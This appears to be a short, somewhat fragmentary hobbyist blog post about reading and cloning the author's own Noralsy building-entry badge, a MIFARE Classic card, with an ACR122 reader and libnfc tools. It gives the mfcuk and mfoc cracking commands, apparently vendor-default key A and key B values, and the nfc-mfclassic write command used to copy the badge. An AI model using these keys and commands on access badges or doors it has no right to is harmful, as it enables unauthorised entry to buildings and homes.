I've got a nice flat, and one has to pass several doors before getting inside it. One of them can be opened with a badge from noralsy:
I got bored, and though that it would be a nice pretext to play a bit with
I bought an ACR122 for a couple of euros, along with
a few blank cards, plugged it into an USB port, ran
nfc-list, and got this:
$ nfc-list nfc-list uses libnfc 1.7.1 error libnfc.driver.acr122_usb Unable to claim USB interface (Device or resource busy) nfc-list: ERROR: Unable to open NFC device: acr122_usb:002:011 $
The solution is simply to unload the
pn533_usb module (and not only the
$ nfc-list nfc-list uses libnfc 1.7.1 NFC device: ACS / ACR122U PICC Interface opened $
The keys can be bruteforced with mfcuk
./mfcuk -C -R 0:A -s 250 -S 250, but it's smarter to try a few obvious
keys with mfoc
(along with this patch to speed
things up) before, like variations of
$ python bf.py output.mfd [+] Found key A: 414c41524f4e [+] Found key B: 424c41524f4e [+] Everything was dumped.
BLARON: well done noralys.
The weird part is that the card is completely empty,
expect the vendor-reserved block
00. The only remaining thing to do now is to
check if I can open other noralys doors with my badge.
It's also trivial to clone it:
nfc-mfclassic w output.mfd output.mfd.
I thought that the whole process would be more complex, so I'm a bit disapointed, but at least I've got fancy badges for my friends now.